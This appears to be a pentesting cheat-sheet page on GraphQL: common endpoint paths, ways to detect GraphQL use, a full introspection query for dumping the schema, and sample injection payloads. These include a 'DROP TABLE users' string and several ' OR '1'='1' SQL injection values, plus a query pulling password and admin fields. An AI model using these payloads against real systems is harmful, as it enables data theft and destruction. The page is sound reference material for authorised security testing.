GraphQL Pentesting

Endpoints

/graphql
/api/graphql
/graphql/v1
/v1/graphql
/gql

Wordlist

/usr/share/wordlists/seclists/Discover/Web-Content/graphql.txt

Where to look for GraphQL usage:

Input data, then press F12 (developer tools) and go in "Network tab". Send the data and check the request/response fields to look for terms like "Query" or "Mutation".

2) Trigger error messages

Example

curl -X POST http://domain.local:8080/graphql

3) JavaScript files

View them by pressing F12 -> Sources/Debugger, then search for keywords like

graphql, /graphql, mutaation, query

After verification of GraphQL presence

1) Check for excessive data exposure

Example query

{
  user(id: "1") {
    id
    username
    email
    password
    is_admin
  }
}

2) Injection

Example query

{
  user(id: "1; DROP TABLE users; --") {
    name
  }
}

GraphQL introspection

Tools:

Graphiql https://github.com/graphql/graphiql
Graphql Voyager https://apis.guru/graphql-voyager/

1) Check if schema introspection is enabled

{__schema{types{name,fields{name}}}}

2) Dump the entire GraphQL schema

query IntrospectionQuery{__schema{queryType{name}mutationType{name}subscriptionType{name}types{...FullType}directives{name description locations args{...InputValue}}}}fragment FullType on __Type{kind name description fields(includeDeprecated:true){name description args{...InputValue}type{...TypeRef}}inputFields{...InputValue}interfaces{...TypeRef}enumValues(includeDeprecated:true){name description}possibleTypes{...TypeRef}}fragment InputValue on __InputValue{name description type{...TypeRef}defaultValue}fragment TypeRef on __Type{kind name ofType{kind name ofType{kind name ofType{kind name}}}}

Example query

{
	"query":
	"query IntrospectionQuery { __schema { queryType { name } mutationType { name } subscriptionType { name } types { ...FullType } directives { name description args { ...InputValue } locations } } } fragment FullType on __Type { kind name description fields(includeDeprecated: true) { name description args { ...InputValue } type { ...TypeRef } isDeprecated deprecationReason } inputFields { ...InputValue } interfaces { ...TypeRef } enumValues(includeDeprecated: true) { name description isDeprecated deprecationReason } possibleTypes { ...TypeRef } } fragment InputValue on __InputValue { name description type { ...TypeRef } defaultValue } fragment TypeRef on __Type { kind name ofType { kind name ofType { kind name ofType { kind name } } } }"
}

Go to GraphQL Voyager and paste the response from the query to visualize the schema.

3) Check what operations you can do with GraphQL

4) SQL Injection example

{users(searchTerm:"' OR '1'='1")}

Example query

{"query":"\n                query ($username: String!) {\n                    users(username: $username) {\n                        id\n                        username\n                        password\n                    }\n                }\n            ","variables":{"username":"test' OR '1'='1"}}

PreviousGit Hooks NextHTTP/2 Request Tunneling

Last updated 15 days ago

hashtagEndpoints

hashtagWordlist

hashtagWhere to look for GraphQL usage:

hashtag1) Login pages

hashtag2) Trigger error messages

hashtag3) JavaScript files

hashtagAfter verification of GraphQL presence

hashtag1) Check for excessive data exposure

hashtag2) Injection

hashtagGraphQL introspection

hashtag1) Check if schema introspection is enabled

hashtag2) Dump the entire GraphQL schema

hashtag3) Check what operations you can do with GraphQL

hashtag4) SQL Injection example

Endpoints

Wordlist

Where to look for GraphQL usage:

1) Login pages

2) Trigger error messages

3) JavaScript files

After verification of GraphQL presence

1) Check for excessive data exposure

2) Injection

GraphQL introspection

1) Check if schema introspection is enabled

2) Dump the entire GraphQL schema

3) Check what operations you can do with GraphQL

4) SQL Injection example